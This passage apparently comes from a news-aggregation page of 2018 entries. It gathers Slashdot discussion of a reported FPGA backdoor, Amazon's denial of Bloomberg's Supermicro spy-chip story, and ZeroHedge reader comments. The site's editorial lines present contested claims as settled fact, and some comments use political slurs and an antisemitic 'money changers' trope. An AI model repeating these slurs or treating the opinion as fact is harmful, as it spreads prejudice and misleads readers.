"The Intel Management Engine (ME), also known as the Manageability Engine, is an autonomous subsystem that has been incorporated in virtually all of Intel's processor chipsets since 2008. The subsystem primarily consists of proprietary firmware running on a separate microprocessor that performs tasks during boot-up, while the computer is running, and while it is asleep. As long as the chipset or SoC is connected to current (via battery or power supply), it continues to run even when the system is turned off. Intel claims the ME is required to provide full performance. Its exact workings are largely undocumented and its code is obfuscated using confidential Huffman tables stored directly in hardware, so the firmware does not contain the information necessary to decode its contents. Intel's main competitor AMD has incorporated the equivalent AMD Secure Technology (formerly called Platform Security Processor) in virtually all of its post-2013 CPUs.

The Electronic Frontier Foundation (EFF) and security expert Damien Zammit accuse the ME of being a backdoor and a privacy concern. Zammit states that the ME has full access to memory (without the parent CPU having any knowledge); has full access to the TCP/IP stack and can send and receive network packets independent of the operating system, thus bypassing its firewall. Intel asserts that it "does not put back doors in its products" and that its products do not "give Intel control or access to computing systems without the explicit permission of the end user."

[Oct 04, 2018] Despicable fear mongering by Bloomberg

Notable quotes:
"... Plus according to Microsemi's own website, all military and aerospace qualified versions of their parts are still made in the USA. So this "researcher" used commercial parts, which depending on the price point can be made in the plant in Shanghai or in the USA at Microsemi's own will. ..."
"... The "researcher" and the person who wrote the article need to spend some time reading more before talking. ..."
"... You clearly have NOT used a FPGA or similar. First the ProASIC3 the article focuses on is the CHEAPEST product in the product line (some of that model line reach down to below a dollar each). But beyond that ... Devices are SECURED by processes, such as blowing the JTAG fuses in the device which makes them operation only, and unreadable. They are securable, if you follow the proper processes and methods laid out by the manufacturer of the specific chip. ..."
"... Just because a "research paper" claims there is other than standard methods of JTAG built into the JTAG doesn't mean that the device doesn't secure as it should, nor does it mean this researcher who is trying to peddle his own product is anything but biased in this situation. ..."
"... You do know that the Mossad has been caught stealing and collecting American Top Secrets. ..."
"... The original article is here. [cam.ac.uk] It refers to an Actel ProAsic3 chip, which is an FPGA with internal EEPROM to store the configuration. ..."
"... With regard to reprogramming the chip remotely or by the FPGA itself via the JTAG port: A secure system is one that can't reprogram itself. ..."
"... When I was designing VMEbus computer boards for a military subcontractor many years ago, every board had a JTAG connector that required the use of another computer with a special cable plugged into the board to perform reprogramming of the FPGAs. None of this update-by-remote-control crap. ..."
"... It seems that People's Republic of China has been misidentified with Taiwan (Republic of China). ..."
"... Either the claims will be backed up by independently reproduced tests or they won't. But, given his apparent track record in this area and the obvious scrutiny this would bring, Skorobogatov must have been sure of his results before announcing this. ..."
"... Where was this undocumented feature/bug designed in? I see plenty of "I hate China" posts, it would be quite hilarious if the fedgov talked the US mfgr into adding this backdoor, then the Chinese built it as designed. Perhaps the plan all along was to blame the Chinese if they're caught. ..."
"... These are not military chips. They are FPGAs that happen to be used occasionally for military apps. Most of them are sold for other, more commercially exploitable purposes. ..."
"... The page with a link to the final paper actually does mention China. However, it's an American design from a US company. I suspect we will find the backdoor was in the original plans. It will be interesting to see however. ..."
Oct 04, 2018 | it.slashdot.org

Taco Cowboy ( 5327 ) , Tuesday May 29, 2012 @12:17AM ( #40139317 ) Journal

It's a scam !! ( Score: 5 , Informative)

http://erratasec.blogspot.com/2012/05/bogus-story-no-chinese-backdoor-in.html [blogspot.com]

Bogus story: no Chinese backdoor in military chip
"Today's big news is that researchers have found proof of Chinese manufacturers putting backdoors in American chips that the military uses. This is false. While they did find a backdoor in a popular FPGA chip, there is no evidence the Chinese put it there, or even that it was intentionally malicious.

Furthermore, the Actel ProAsic3 FPGA chip isn't fabricated in China at all !!

jhoegl ( 638955 ) , Monday May 28, 2012 @01:30PM ( #40136003 )
Fear mongering ( Score: 5 , Insightful)

It sells...

khasim ( 1285 ) writes on Monday May 28, 2012 @01:48PM ( #40136097 )
Particularly in a press release like that. ( Score: 5 , Insightful)

That entire article reads more like a press release with FUD than anything with any facts.

Which chip?
Which manufacturer?
Which US customer?

No facts and LOTS of claims. It's pure FUD.

(Not that this might not be a real concern. But the first step is getting past the FUD and marketing materials and getting to the real facts.)

ArsenneLupin ( 766289 ) , Tuesday May 29, 2012 @01:11AM ( #40139489 )
Re:Particularly in a press release like that. ( Score: 5 , Informative)

A quick google showed that this is indeed the chip, but the claims are "slightly" overblown [blogspot.com]

Anonymous Coward , Monday May 28, 2012 @02:14PM ( #40136273 )
Most likely inserted by Microsemi/Actel not fab ( Score: 5 , Informative)

1) Read the paper http://www.cl.cam.ac.uk/~sps32/Silicon_scan_draft.pdf
2) This is talking about FPGAs designed by Microsemi/Actel.
3) The article focuses on the ProAsic3 chips but says all the Microsemi/Actel chips tested had the same backdoor including but not limited to Igloo, Fusion and Smartfusion.
4) FPGAs give JTAG access to their internals for programming and debugging but many of the access methods are proprietary and undocumented. (security through obscurity)
5) Most FPGAs have features that attempt to prevent reverse engineering by disabling the ability to read out critical stuff.
6) These chips have a secret passphrase (security through obscurity again) that allows you to read out the stuff that was supposed to be protected.
7) These researchers came up with a new way of analyzing the chip (pipeline emission analysis) to discover the secret passphrase. More conventional analysis (differential power analysis) was not sensitive enough to reveal it.

This sounds a lot (speculation on my part) like a deliberate backdoor put in for debug purposes, security through obscurity at its best. It doesn't sound like something secret added by the chip fab company, although time will tell. Just as embedded controller companies have gotten into trouble putting hidden logins into their code thinking they're making the right tradeoff between convenience and security, this hardware company seems to have done the same.

Someone forgot to tell the marketing droids though and they made up a bunch of stuff about how the h/w was super secure.

JimCanuck ( 2474366 ) , Monday May 28, 2012 @04:45PM ( #40137217 )
Re:Most likely inserted by Microsemi/Actel not fab ( Score: 5 , Interesting)

I don't think anyone fully understands JTAG, there are a lot of different versions of it mashed together on the typical hardware IC, regardless of whether it's an FPGA, microcontroller or otherwise. The so called "back door" can only be accessed through the JTAG port as well, so unless the military installed a JTAG bridge to communicate to the outside world and left it there, well then the "backdoor" is rather useless.

Something that can also be completely disabled by setting the right fuse inside the chip itself to disable all JTAG connections. Something that is considered standard practice on ICs with a JTAG port available once assembled into their final product and programmed.

Plus according to Microsemi's own website, all military and aerospace qualified versions of their parts are still made in the USA. So this "researcher" used commercial parts, which depending on the price point can be made in the plant in Shanghai or in the USA at Microsemi's own will.

The "researcher" and the person who wrote the article need to spend some time reading more before talking.

emt377 ( 610337 ) , Monday May 28, 2012 @07:02PM ( #40137873 )
Re:Most likely inserted by Microsemi/Actel not fab ( Score: 4 , Insightful)
The so called "back door" can only be accessed through the JTAG port as well, so unless the military installed a JTAG bridge to communicate to the outside world and left it there, well then the "backdoor" is rather useless.

With pin access to the FPGA it's trivial to hook it up, no bridges or transceivers needed. If it's a BGA then get a breakout/riser board that provides pin access. This is off-the-shelf stuff. This means if the Chinese military gets their hands on the hardware they can reverse engineer it. They won't have to lean very hard on the manufacturer for them to cough up every last detail. In China you just don't say no to such requests if you know what's good for you and your business.

JimCanuck ( 2474366 ) , Monday May 28, 2012 @11:05PM ( #40139083 )
Re:Most likely inserted by Microsemi/Actel not fab ( Score: 4 , Interesting)
Not being readable even when someone has the device in hand is exactly what these secure FPGAs are meant to protect against!

It's not a non-issue. It's a complete failure of a product to provide any advantages over non-secure equivalents.

You clearly have NOT used a FPGA or similar. First the ProASIC3 the article focuses on is the CHEAPEST product in the product line (some of that model line reach down to below a dollar each). But beyond that ... Devices are SECURED by processes, such as blowing the JTAG fuses in the device which makes them operation only, and unreadable. They are securable, if you follow the proper processes and methods laid out by the manufacturer of the specific chip.

Just because a "research paper" claims there is other than standard methods of JTAG built into the JTAG doesn't mean that the device doesn't secure as it should, nor does it mean this researcher who is trying to peddle his own product is anything but biased in this situation.

nospam007 ( 722110 ) * , Monday May 28, 2012 @02:39PM ( #40136445 )
Re:What did the military expect? ( Score: 4 , Interesting)

"Even if this case turns out to be a false alarm, allowing a nation that you repeatedly refer to as a 'near-peer competitor' to build parts of your high-tech weaponry is idiotic."

Not to mention the non-backdoor ones.

'Bogus electronic parts from China have infiltrated critical U.S. defense systems and equipment, including Navy helicopters and a commonly used Air Force cargo aircraft, a new report says.'

http://articles.dailypress.com/2012-05-23/news/dp-nws-counterfeit-chinese-parts-20120523_1_fake-chinese-parts-counterfeit-parts-air-force-c-130j [dailypress.com]

0123456 ( 636235 ) , Monday May 28, 2012 @02:04PM ( #40136219 )
Re:Should only buy military components from allies ( Score: 3 , Funny)
The US military should have a strict policy of only buying military parts from sovereign, free, democratic countries with a long history of friendship, such as Israel, Canada, Europe, Japan and South Korea.

Didn't the US and UK governments sell crypto equipment they knew they could break to their 'allies' during the Cold War?

tlhIngan ( 30335 ) writes on Monday May 28, 2012 @03:30PM ( #40136781 )
Re:Should only buy military components from allies ( Score: 5 , Insightful)
Second problem.... 20 years ago the DOD had their own processor manufacturing facilities, IC chips, etc. They were shut down in favor of commercial equipment because some idiot decided it was better to have an easier time buying replacement parts at Radioshack than buying quality military-grade components that could last in austere environments. (Yes, speaking from experience). Servers and workstations used to be built from the ground up at places like Tobyhanna Army Depot. Now, servers and workstations are bought from Dell.

Fabs are expensive. The latest generation nodes cost billions of dollars to set up and billions more to run. If they aren't cranking chips out 24/7, they're literally costing money. Yes, I know it's the military, but I'm sure people have a hard time justifying $10B every few years just to fab a few chips. One of the biggest developments in the 90s was the development of foundries that let anyone with a few tens of millions get in the game of producing chips rather than requiring billions in startup costs. Hence the startup of tons of fabless companies selling chips.

OK, another option is to buy a cheap obsolete fab and make chips that way - much cheaper to run, but we're also talking maybe 10+ year old technology, at which point the chips are going to be slower and take more power.

Also, building your own computer from the ground up is expensive - either you buy the designs of your servers from say, Intel, or design your own. If you buy it, it'll be expensive and probably require your fab to be upgraded (or you get stuck with an old design - e.g., Pentium (the original) - which Intel bought back from the DoD because the DoD had been debugging it over the decade). If you went with the older cheaper fab, the design has to be modified to support that technology (you cannot just take a design and run with it - you have to adapt your chip to the foundry you use).

If you roll your own, that becomes a support nightmare because now no one knows the system.

And on the taxpayer side - I'm sure everyone will question why you're spending billions running a fab that's only used at 10% capacity - unless you want the DoD getting into the foundry business with its own issues.

Or, why is the military spending so much money designing and running its own computer architecture and support services when they could buy much cheaper machines from Dell and run Linux on them?

Hell, even if the DoD had budget for that, some bean counter will probably do the same so they can save money from one side and use it to buy more fighter jets or something.

30+ years ago, defense spending on electronics formed a huge part of the overall electronics spending. These days, defense spending is but a small fraction - it's far more lucrative to go after the consumer market than the military - they just don't have the economic clout they once had. End result is the military is forced to buy COTS ICs, or face stuff like a $0.50 chip costing easily $50 or more for the same just because the military is a bit-player for semiconductors.

__aaltlg1547 ( 2541114 ) , Monday May 28, 2012 @02:29PM ( #40136361 )
Re:Should only buy military components from allies ( Score: 2 )

Anybody remember Jonathan Pollard?

Genda ( 560240 ) writes on Monday May 28, 2012 @03:46PM ( #40136857 ) Journal
Re:Should only buy military components from allies ( Score: 2 )

You do know that the Mossad has been caught stealing and collecting American Top Secrets. In fact most of the nations above save perhaps Canada have at one time or another been caught either spying on us, or performing dirty deeds cheap against America's best interest. I'd say for the really classified stuff, like the internal security devices that monitor everything else... homegrown only thanks, and add that any enterprising person who's looking to get paid twice by screwing with the hardware or selling secrets to certified unfriendlies gets to cool their heels for a VERY LONG TIME.

NixieBunny ( 859050 ) , Monday May 28, 2012 @01:34PM ( #40136025 ) Homepage
The actual article ( Score: 5 , Informative)

The original article is here. [cam.ac.uk] It refers to an Actel ProAsic3 chip, which is an FPGA with internal EEPROM to store the configuration.

Anonymous Coward , Monday May 28, 2012 @02:09PM ( #40136249 )
Re:The actual article ( Score: 5 , Interesting)

From your much more useful link,

We investigated the PA3 backdoor problem through Internet searches, software and hardware analysis and found that this particular backdoor is not a result of any mistake or an innocent bug, but is instead a deliberately inserted and well thought-through backdoor that is crafted into, and part of, the PA3 security system. We analysed other Microsemi/Actel products and found they all have the same deliberate backdoor. Those products include, but are not limited to: Igloo, Fusion and Smartfusion.
we have found that the PA3 is used in military products such as weapons, guidance, flight control, networking and communications. In industry it is used in nuclear power plants, power distribution, aerospace, aviation, public transport and automotive products. This permits a new and disturbing possibility of a large scale Stuxnet-type attack via a network or the Internet on the silicon itself. If the key is known, commands can be embedded into a worm to scan for JTAG, then to attack and reprogram the firmware remotely.

emphasis mine. Key is retrieved using the backdoor. Frankly, if this is true, Microsemi/Actel should get a complete ban from all government contracts, including using their chips in any item built for use by the government.

NixieBunny ( 859050 ) , Monday May 28, 2012 @02:44PM ( #40136487 ) Homepage
Re:The actual article ( Score: 3 )

I would not be surprised if it's a factory backdoor that's included in all their products, but is not documented and is assumed to not be a problem because it's not documented.

With regard to reprogramming the chip remotely or by the FPGA itself via the JTAG port: A secure system is one that can't reprogram itself.

When I was designing VMEbus computer boards for a military subcontractor many years ago, every board had a JTAG connector that required the use of another computer with a special cable plugged into the board to perform reprogramming of the FPGAs. None of this update-by-remote-control crap.

Blackman-Turkey ( 1115185 ) , Monday May 28, 2012 @02:19PM ( #40136305 )
Re:The actual article ( Score: 3 , Informative)

No source approved [dla.mil] for Microsemi (Actel) qualified chips in China. If you use non-approved sources then, well, shit happens (although how this HW backdoor would be exploited is kind of unclear).

It seems that People's Republic of China has been misidentified with Taiwan (Republic of China).

6031769 ( 829845 ) , Monday May 28, 2012 @01:35PM ( #40136031 ) Homepage Journal
Wait and see ( Score: 5 , Informative)

Either the claims will be backed up by independently reproduced tests or they won't. But, given his apparent track record in this area and the obvious scrutiny this would bring, Skorobogatov must have been sure of his results before announcing this.

Here's his publications list from his University home page, FWIW: http://www.cl.cam.ac.uk/~sps32/#Publications [cam.ac.uk]

Anonymous Coward , Monday May 28, 2012 @01:36PM ( #40136039 )
samzenpus will be looking for a new job soon ( Score: 3 , Funny)
Even though this story has been blowing-up on Twitter, there are a few caveats. The backdoor doesn't seem to have been confirmed by anyone else, Skorobogatov is a little short on details, and he is trying to sell the scanning technology used to uncover the vulnerability.

Hey hey HEY! You stop that right this INSTANT, samzenpus! This is Slashdot! We'll have none of your "actual investigative research" nonsense around here! Fear mongering to sell ad space, mister, and that's ALL! Now get back to work! We need more fluffy space-filling articles like that one about the minor holiday labeling bug Microsoft had in the UK! That's what we want to see more of!

laing ( 303349 ) , Monday May 28, 2012 @02:08PM ( #40136243 )
Requires Physical Access ( Score: 5 , Informative)

The back-door described in the white paper requires access to the JTAG (1149.1) interface to exploit. Most deployed systems do not provide an active external interface for JTAG. With physical access to a "secure" system based upon these parts, the techniques described in the white paper allow for a total compromise of all IP within. Without physical access, very little can be done to compromise systems based upon these parts.

vlm ( 69642 ) , Monday May 28, 2012 @03:34PM ( #40136807 )
Where was it designed in? ( Score: 3 )

Where was this undocumented feature/bug designed in? I see plenty of "I hate China" posts, it would be quite hilarious if the fedgov talked the US mfgr into adding this backdoor, then the Chinese built it as designed. Perhaps the plan all along was to blame the Chinese if they're caught.

These are not military chips. They are FPGAs that happen to be used occasionally for military apps. Most of them are sold for other, more commercially exploitable purposes.

time961 ( 618278 ) , Monday May 28, 2012 @03:51PM ( #40136887 )
Big risk is to "secret sauce" for comms & cryp ( Score: 5 , Informative)

This is a physical-access backdoor. You have to have your hands on the hardware to be able to use JTAG. It's not a "remote kill switch" driven by a magic data trigger, it's a mechanism that requires use of a special connector on the circuit board to connect to a dedicated JTAG port that is simply neither used nor accessible in anything resembling normal operation.

That said, it's still pretty bad, because hardware does occasionally end up in the hands of unfriendlies (e.g., crashed drones). FPGAs like these are often used to run classified software radio algorithms with anti-jam and anti-interception goals, or to run classified cryptographic algorithms. If those algorithms can be extracted from otherwise-dead and disassembled equipment, that would be bad--the manufacturer's claim that the FPGA bitstream can't be extracted might be part of the system's security certification assumptions. If that claim is false, and no other counter-measures are in place, that could be pretty bad.

Surreptitiously modifying a system in place through the JTAG port is possible, but less of a threat: the adversary would have to get access to the system and then return it without anyone noticing. Also, a backdoor inserted that way would have to co-exist peacefully with all the other functions of the FPGA, a significant challenge both from an intellectual standpoint and from a size/timing standpoint--the FPGA may just not have enough spare capacity or spare cycles. They tend to be packed pretty full, 'coz they're expensive and you want to use all the capacity you have available to do clever stuff.

Fnord666 ( 889225 ) , Monday May 28, 2012 @09:16PM ( #40138557 ) Journal
Re:Big risk is to "secret sauce" for comms & c ( Score: 4 , Insightful)
This is a physical-access backdoor. You have to have your hands on the hardware to be able to use JTAG. It's not a "remote kill switch" driven by a magic data trigger, it's a mechanism that requires use of a special connector on the circuit board to connect to a dedicated JTAG port that is simply neither used nor accessible in anything resembling normal operation.

Surreptitiously modifying a system in place through the JTAG port is possible, but less of a threat: the adversary would have to get access to the system and then return it without anyone noticing.

As someone else mentioned in another post, physical access can be a bit of a misnomer. Technically all that is required is for a computer to be connected via the JTAG interface in order to exploit this. This might be a diagnostic computer for example. If that diagnostic computer were to be infected with a targeted payload, there is your physical access.

nurb432 ( 527695 ) , Monday May 28, 2012 @02:43PM ( #40136477 ) Homepage Journal
Re:Is it called JTAG? ( Score: 2 )

I agree it most likely wasn't malicious, but it's more than careless, it's irresponsible, especially when dealing with military contracts.

rtfa-troll ( 1340807 ) , Monday May 28, 2012 @03:22PM ( #40136743 )
Re:No China link yet, probably a US backdoor ( Score: 2 )
There is no China link to the backdoor yet.

The page with a link to the final paper actually does mention China. However, it's an American design from a US company. I suspect we will find the backdoor was in the original plans. It will be interesting to see however.

[Oct 04, 2018] Bloomberg is spreading malicious propaganda trying to blame China for modifying hardware with some additional chips

Kind of Chinagate, but here China means Taiwan and the design is US-based. Completely false malicious rumors -- a propaganda attack on China. The goal is clearly to discredit Chinese hardware manufacturers by spreading technical innuendo. In other words, this is a kick below the belt.
Bloomberg jerks are just feeding hacker paranoia.
First of all, this is not easy to do; secondly, this is a useless exercise, as you need access to the TCP/IP stack of the computer to transmit information. Software Trojans are a much more productive area for such activities.
Oct 04, 2018 | www.zerohedge.com

Today, Bloomberg BusinessWeek published a story claiming that AWS was aware of modified hardware or malicious chips in SuperMicro motherboards in Elemental Media's hardware at the time Amazon acquired Elemental in 2015, and that Amazon was aware of modified hardware or chips in AWS's China Region.

As we shared with Bloomberg BusinessWeek multiple times over the last couple months, this is untrue. At no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in SuperMicro motherboards in any Elemental or Amazon systems. Nor have we engaged in an investigation with the government.

There are so many inaccuracies in this article as it relates to Amazon that they're hard to count. We will name only a few of them here. First, when Amazon was considering acquiring Elemental, we did a lot of due diligence with our own security team, and also commissioned a single external security company to do a security assessment for us as well. That report did not identify any issues with modified chips or hardware. As is typical with most of these audits, it offered some recommended areas to remediate, and we fixed all critical issues before the acquisition closed. This was the sole external security report commissioned. Bloomberg has admittedly never seen our commissioned security report nor any other (and refused to share any details of any purported other report with us).

The article also claims that after learning of hardware modifications and malicious chips in Elemental servers, we conducted a network-wide audit of SuperMicro motherboards and discovered the malicious chips in a Beijing data center. This claim is similarly untrue. The first and most obvious reason is that we never found modified hardware or malicious chips in Elemental servers. Aside from that, we never found modified hardware or malicious chips in servers in any of our data centers. And, this notion that we sold off the hardware and datacenter in China to our partner Sinnet because we wanted to rid ourselves of SuperMicro servers is absurd. Sinnet had been running these data centers since we launched in China, they owned these data centers from the start, and the hardware we "sold" to them was a transfer-of-assets agreement mandated by new China regulations for non-Chinese cloud providers to continue to operate in China.

Amazon employs stringent security standards across our supply chain – investigating all hardware and software prior to going into production and performing regular security audits internally and with our supply chain partners. We further strengthen our security posture by implementing our own hardware designs for critical components such as processors, servers, storage systems, and networking equipment.

Security will always be our top priority. AWS is trusted by many of the world's most risk-sensitive organizations precisely because we have demonstrated this unwavering commitment to putting their security above all else. We are constantly vigilant about potential threats to our customers, and we take swift and decisive action to address them whenever they are identified.

– Steve Schmidt, Chief Information Security Officer

Trumptards are IDIOTs

CashMcCall , 5 hours ago

TRUMPTARDS have an enormous amount of surplus time on their hands to forward their Harry Potter Styled Conspiracies.

APPLE AND AMAZON DENIED THE STORY. STORY OVER... GET IT CREEPY?

CashMcCall , 5 hours ago

While TRUMPTARDS were posting their Conspiracy Theories and the "TrumpEXPERTS" were embellishing the ridiculous story with their lavish accounts of chip bug design, I was enjoying a Bloomberg windfall.

Having confirmed early that the story was False since AMAZON and APPLE BOTH DENIED IT... and their stock was not moving, I turned to Supermicro which was plunging and down over 50%. I checked the options, and noted they were soft, so I put in bids for long shares and filled blocks at 9 from two accounts.

The moronic TRUMPTARD Conspiracy posts continued, Supermicro is now up over 13.

That is the difference between having a brain in your head or having TRUMPTARD **** FOR BRAINS...

Urban Roman , 5 hours ago

On second thought, this story is just ********. Note that the BBG story never mentions the backdoors that were talked about for over a decade, nor did they mention Mr. Snowden's revelation that those backdoors do exist, and are being used, by the surveillance state.

Since the Chinese factories are manufacturing these things, they'd have all the specs and the blobs and whatever else they need, and would never require a super-secret hardware chip like this. Maybe this MITM chip exists, and maybe it doesn't. But there's nothing to keep China from using the ME on any recent Intel chip, or the equivalent on any recent AMD chip, anywhere.

The purpose of this article is to scare you away from using Huawei or ZTE for anything, and my guess is that it is because those companies did not include these now-standard backdoors in their equipment. Maybe they included Chinese backdoors instead, but again, they wouldn't need a tiny piece of hardware for this MITM attack, since modern processors are all defective by design.

Chairman , 5 hours ago

I think I will start implementing this as an interview question. If a job candidate is stupid enough to believe this **** then they will not work for me.

DisorderlyConduct , 4 hours ago

Well, hmmm, could be. To update a PCB is actually really poor work. I would freak my biscuits if I received one of my PCBs with strange pads, traces or parts.

To substitute a part is craftier. To change the content of a part is harder, and nigh impossible to detect without xray.

Even craftier is to change VHDL code in an OTP chip or an ASIC. The package and internal structure is the same but the fuses would be burned different. No one would likely detect this unless they were specifically looking for it.

Kendle C , 5 hours ago

Well written propaganda fails to prove claims. Everybody in networking and IT knows that switches and routers have access to root, built in, often required by government, backdoors. Scripts are no big thing often used to speed up updates, backups, and troubleshooting. So when western manufacturers began shoveling their work to Taiwan and China, with them they sent millions of text files, including instructions for backdoor access, the means and technology (to do what this **** article is claiming) to modify the design, even classes with default password and bypass operations for future techs. We were shoveling hand over foot designs as fast as we could...all for the almighty dollar while stiffing American workers. So you might say greed trumped security and that fault lies with us. So stuff this cobbled together propaganda piece, warmongering ****.

AllBentOutOfShape , 5 hours ago

ZH has definitely been co-opted. This is just the latest propaganda ******** article of the week they've come out with. I'm seeing more and more articles sourced from well known propaganda outlets in recent months.

skunzie , 6 hours ago

Reminds me of how the US pulled off covert espionage of the Russians in the 70's using Xerox copiers. The CIA inserted trained Xerox copy repairmen to handle repairs on balky copiers in Russian embassies, etc. When a machine was down the technician inserted altered motherboards which would transmit future copies directly to the CIA. This is a cautionary tale for companies to cover their Achilles heel (weakest point), as that is generally the easiest way to infiltrate the unsuspecting company.

PrivetHedge , 6 hours ago

What another huge load of bollocks from our pharisee master morons.

I guess they think we're as stupid as they are.

CashMcCall , 6 hours ago

But but but the story came from one of the chosen money changers Bloomberg... everyone knows a *** would never lie or print a false story at the market open

smacker , 7 hours ago

With all the existing ***** chips and backdoors on our computers and smartphones planted by the CIA, NSA, M$, Goolag & friends, and now this chip supposedly from China, it won't be long before there's no space left in RAM and on mobos for the chips that actually make the device do what we bought it to do.

Stinkbug 1 , 7 hours ago

This was going on 20 years ago when it was discovered that digital picture frames from China were collecting passwords and sending them back. It was just a test, so didn't get much press.

Now they have the kinks worked out, and are ready for the coup de grace.

I Write Code , 7 hours ago

https://www.reddit.com/r/news/comments/9lac9k/china_used_a_tiny_chip_in_a_hack_that_infiltrated/?st=JMUNFMRR&sh=10c388fb

ChecksandBalances , 7 hours ago

This story seemed to die. Did anyone find anything indicating someone on our side has actually got a look at the malicious chip, assuming it exists? Technical blogs have nothing, only news rags like NewsMaxx. If 30 companies had these chips surely someone has one. This might be one huge fake news story. Why Bloomberg would publish it is kind of odd.

FedPool , 7 hours ago

Probably a limited evaluation operation to gauge the population's appetite for war. Pentagram market research. They're probably hitting all of the comment sections around the web as we speak. Don't forget to wave 'hi'.

Heya warmongers. No, we don't want a war yet, k thanks.

underlying , 7 hours ago

Since we're on the topic, let's take a look at the scope of hacking tools known to the general public prior to the Supermicro Server Motherboard Hardware Exploit; (P.S. What the **** do you expect when you have Chinese state owned enterprises, at minimum quasi state owned enterprises in special economic development zones controlled by the Chinese communist party, building motherboards?)

Snowden NSA Leaks published in the Guardian/Intercept

https://www.theguardian.com/us-news/the-nsa-files

Wikileaks Vault 7 etc....

https://wikileaks.org/vault7/

Spectre/Meltdown vulnerability exploits

https://leeneubecker.com/grc-releases-test-tool-spectre-and-meltdown-vulnerabilities/

Random list compiled by TC bitches

https://techcrunch.com/2017/03/09/names-and-definitions-of-leaked-cia-hacking-tools/

This does not include the private/corporate sector hacking pen testing resources and suites which are abundant and easily available to **** up the competition in their own right.

i.e., https://gbhackers.com/hacking-tools-list/

Urban Roman , 5 hours ago

Exactly. Why would they ever need a super-micro-man-in-the-middle-chip?

Maybe this 'chip' serves some niche in their spycraft, but the article in the keypost ignores a herd of elephants swept under the carpet, and concentrates on a literal speck of dust.

Moribundus , 8 hours ago

A US-funded biomedical laboratory in Georgia may have conducted bioweapons research under the guise of a drug test, which claimed the lives of at least 73 subjects...new documents "allow us to take a fresh look" at outbreaks of African swine fever in southern Russia in 2007-2018, which "spread from the territory of Georgia into the Russian Federation, European nations and China. The infection strain in the samples collected from animals killed by the disease in those nations was identical to the Georgia-2007 strain." https://www.rt.com/news/440309-us-georgia-toxic-bioweapon-test/

Dr. Acula , 8 hours ago

"In a Senate testimony this past February, six major US intelligence heads warned that American citizens shouldn't use Huawei and ZTE products and services." - https://www.theverge.com/2018/5/2/17310870/pentagon-ban-huawei-zte-phones-retail-stores-military-bases

Are these the same intelligence agencies that complain about Russian collusion and cover up 9/11 and pizzagate?

[Sep 05, 2018] West Virginia Offers Free Cybersecurity Training To the Elderly

Sep 04, 2018 | news.slashdot.org
msmash on Tuesday September 04, 2018 @10:50AM from the how-about-that dept

West Virginia's Attorney General Patrick Morrisey, who's currently running for U.S. Senate, announced Tuesday that he's partnering with two local community and technical colleges to connect senior citizens with college students for free cybersecurity training.

The announcement comes amid rising cyber scams, many of which are targeted at the elderly.

[Sep 03, 2018] The US Department of Homeland Security fabricated "intelligence reports" of Russian election hacking

Russiagate can be viewed as a pretty inventive way for bloated intelligence services to justify their own existence: first the CIA hacks something, leaving traces of Russians or Chinese; then the FBI, CIA and Department of Homeland Security all enjoy additional money and people to counter the threat.
The scheme is almost untraceable.
Sep 03, 2018 | www.moonofalabama.org
BM , Sep 3, 2018 12:54:15 PM | link

The US Department of Homeland Security fabricated "intelligence reports" of Russian election hacking in order to try to get control of the election infrastructure (probably so that they can hack it more easily to control the election results).

How the Department of Homeland Security Created a Deceptive Tale of Russia Hacking US Voter Sites

[Aug 22, 2018] Microsoft has reason to get in the good graces of the CIA, NSA and Pentagon at this time: Quid pro quo

Notable quotes:
"... In the running are Amazon Web Services, IBM and Microsoft. Winning this contract gives the winner an advantage in winning future related contracts ..."
Aug 22, 2018 | www.moonofalabama.org

librul | Aug 21, 2018 11:04:43 PM | 48

Can we see Microsoft's actions today as a sales pitch?

https://www.nextgov.com/it-modernization/2018/07/pentagon-accepting-bids-its-controversial-10-billion-war-cloud/150059/

The Defense Department on Thursday officially began accepting proposals for its highly-anticipated Joint Enterprise Defense Infrastructure cloud contract. The JEDI contract will be awarded to a single cloud provider -- an issue many tech companies rallied against -- and will be valued at up to $10 billion over 10 years, according to the final request for proposal. The contract itself will put a commercial company in charge of hosting and distributing mission-critical workloads and classified military secrets to warfighters around the globe in a single war cloud.

https://www.defenseone.com/technology/2018/08/someone-waging-secret-war-undermine-pentagons-huge-cloud-contract/150685/

As some of the biggest U.S. technology companies have lined up to bid on the $10 billion contract to create a massive Pentagon cloud computing network, the behind-the-scenes war to win it has turned ugly.

In the running are Amazon Web Services, IBM and Microsoft. Winning this contract gives the winner an advantage in winning future related contracts.

[Aug 02, 2018] There was a big row over Kaspersky's software actually doing its job and detecting malware on an NSA officer's personal workstation at home, where he was conducting development in an unauthorized manner.

Notable quotes:
"... There was a big row over Kaspersky's software actually doing its job and detecting malware on an NSA officer's personal workstation at home, where he was conducting development in an unauthorized manner. The software did as it is designed, which is upload the suspicious software to Kaspersky's servers for analysis. This was represented by the US government as some sort of "spying for the Russian intelligence community" by Kaspersky. The US government also made a big deal over the fact that Kaspersky does work with the Russian government on computer security issues, as one would expect of such a company. ..."
Aug 02, 2018 | turcopolier.typepad.com

richardstevenhack -> Bill Herschel , a day ago

Yes, PostgreSQL is very good. It's open source, meaning the source code is available for inspection, so if there was anything suspicious about it, it would likely have been caught before now. Of course, bugs and security issues might well remain, regardless.

Russians make a lot of good software. Their computer training in universities has always been first rate.

This is similar to the big issue over the Kaspersky company, a major manufacturer of a high-quality antimalware suite, being Russian. The US has made it a big issue, passing regulations that prohibit US government offices from using it, forcing Kaspersky to consider moving to Switzerland. I don't think many people in the infosec community have any concerns about Kaspersky being Russian. They've been in the antimalware business for quite a while and always get top marks in the independent antimalware tests.

There was a big row over Kaspersky's software actually doing its job and detecting malware on an NSA officer's personal workstation at home, where he was conducting development in an unauthorized manner. The software did as it is designed, which is upload the suspicious software to Kaspersky's servers for analysis. This was represented by the US government as some sort of "spying for the Russian intelligence community" by Kaspersky. The US government also made a big deal over the fact that Kaspersky does work with the Russian government on computer security issues, as one would expect of such a company.

The whole thing is just another example of "Russian Derangement Syndrome."

[Jul 05, 2018] Stuxnet opened a can of worms

Jul 05, 2018 | www.theamericanconservative.com

...Stuxnet, which was thought to be a joint American-Israeli assault on Iran's nuclear program. And there are reports of U.S. attempts to similarly hamper North Korean missile development. Some consider such direct attacks on other governments to be akin to acts of war. Would Washington join Moscow in a pledge to become a good cyber citizen?

[Jun 28, 2018] Did Senator Warner and Comey 'Collude' on Russia-gate by Ray McGovern

Notable quotes:
"... The U.S. was in talks for a deal with Julian Assange but then FBI Director James Comey ordered an end to negotiations after Assange offered to prove Russia was not involved in the DNC leak, as Ray McGovern explains. ..."
"... Special to Consortium News ..."
